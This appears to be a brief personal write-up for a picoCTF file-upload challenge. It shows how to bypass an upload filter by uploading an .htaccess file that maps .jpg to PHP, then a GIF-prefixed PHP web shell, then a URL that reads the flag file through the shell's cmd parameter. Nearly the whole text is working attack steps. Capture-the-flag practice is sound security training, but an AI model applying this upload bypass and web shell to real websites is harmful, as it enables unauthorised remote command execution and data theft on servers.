file upload

1> .htaccess (pico ctf medium byp4ss3d )

1. upload a .htaccess file with inside body of

AddType application/x-httpd-php .jpg

1. now that server have accepeted this so just go for

a new reverse shell or best is simple a normal cmd cmds

cat > shell.jpg << 'EOF'
GIF89a;
<?php system($_GET['cmd']); ?>
EOF

http://amiable-citadel.picoctf.net:59014/images/shell.jpg?cmd=cat+/var/www/flag.txtamiable-citadel.picoctf.net

---

---